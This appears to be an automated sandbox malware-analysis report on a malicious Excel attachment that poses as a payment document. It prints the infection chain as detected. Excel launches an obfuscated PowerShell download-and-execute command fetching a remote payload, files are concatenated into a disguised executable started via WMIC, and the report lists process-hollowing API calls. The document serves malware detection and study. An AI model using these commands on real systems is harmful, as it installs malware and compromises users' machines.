Source: Screenshot number: 4 Screenshot OCR: Enable Content 5 Al - " ;& r 6 I A I B C D E F I G I H I I I J C 7 8 1 9 2 10 3 11 4
Source: Screenshot number: 8 Screenshot OCR: Enable Editing" form the yellow bar and then click 5 8 "Enable Content" ,6 g 7 10 ,8 11 ,9 12
Source: Screenshot number: 8 Screenshot OCR: Enable Content X ' . Al " (" jR " 5 7 A B I C I D I, E I F G H I J K 'T , 1 I y 3 2 : Qil D?'
Contains functionality to create processes via WMI
Source: WMIC.exe, 0000001A.00000002.345078681.00000000035D0000.00000004.00000020.sdmp Binary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\WMIC.exeWmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpgWmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpgWinSta0\Default
Found Excel 4.0 Macro with suspicious formulas
Source: Scanned_25526662-Payment.xls Initial sample: EXEC
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Test1.txt Jump to dropped file
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_00424D1A NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory, 27_2_00424D1A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_022100C7 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread, 27_2_022100C7
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221002C NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread, 27_2_0221002C
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221000B NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread, 27_2_0221000B
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210072 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread, 27_2_02210072
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_00478772 __EH_prolog,GetModuleHandleA,GetProcAddress,GetCurrentThread,NtSetInformationThread, 29_2_00478772
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_005C6B10: new,DeviceIoControl, 29_2_005C6B10
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_006940D0 29_2_006940D0
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_006849A0 29_2_006849A0
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0040EA7D 29_2_0040EA7D
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_004F2AA7 29_2_004F2AA7
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0042ABC1 29_2_0042ABC1
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0068321E 29_2_0068321E
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_00411532 29_2_00411532
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_004276C4 29_2_004276C4
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_00689D67 29_2_00689D67
Document contains embedded VBA macros
Source: Scanned_25526662-Payment.xls OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: String function: 006876A0 appears 81 times
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: String function: 006811C5 appears 69 times
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: String function: 006B08FC appears 794 times
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: String function: 00411C35 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: String function: 00680E81 appears 125 times
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: String function: 006850AE appears 33 times
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: String function: 005CEF10 appears 131 times
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: String function: 00411FB1 appears 168 times
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: String function: 00696B06 appears 44 times
PE file does not import any functions
Source: nwaha3c5.dll.21.dr Static PE information: No import functions for PE file found
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Yara signature match
Source: Scanned_25526662-Payment.xls, type: SAMPLE Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: C:\Users\user\Desktop\1BA10000, type: DROPPED Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: Test3.jpg.23.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@19/22@1/2
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0045624F __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle, 29_2_0045624F
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_004231B3 __CxxThrowException@8,GetLastError,LoadResource,LockResource,SizeofResource, 29_2_004231B3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Mutant created: \Sessions\1\BaseNamedObjects\693cae42864dd7a2e04c35636e49f749
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{BF342920-9C68-4407-BD39-EA487E52A3EE} - OProcSessId.dat Jump to behavior
Source: Scanned_25526662-Payment.xls OLE indicator, Workbook stream: true
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Scanned_25526662-Payment.xls Virustotal: Detection: 14%
Source: Scanned_25526662-Payment.xls ReversingLabs: Detection: 15%
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESBD2F.tmp' 'c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP'
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C WmIC PRocESs CAlL cREAtE %TEMP%\Test3.jpg
Source: unknown Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpg
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\cmd.exe cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )) Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )) Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline' Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C WmIC PRocESs CAlL cREAtE %TEMP%\Test3.jpg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESBD2F.tmp' 'c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Process created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior

Data Obfuscation:

barindex
PowerShell case anomaly found
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\cmd.exe cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )) Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )) Jump to behavior
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline' Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_007D5210 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 29_2_007D5210
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_00402F43 pushfd ; iretd 27_2_00402F49
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_00682156 push ecx; ret 29_2_00682169
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_006B08FC push eax; ret 29_2_006B091A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_006B099C push ecx; ret 29_2_006B09AC
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_00400F04 push eax; ret 29_2_00400F3F
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0068118E push ecx; ret 29_2_006811A1
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0042BBAE push eax; ret 29_2_0042BBAF
Source: initial sample Static PE information: section name: .text entropy: 7.92605680707

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Test1.txt Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.dll Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\Test3.jpg Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Test1.txt Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\Test3.jpg Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
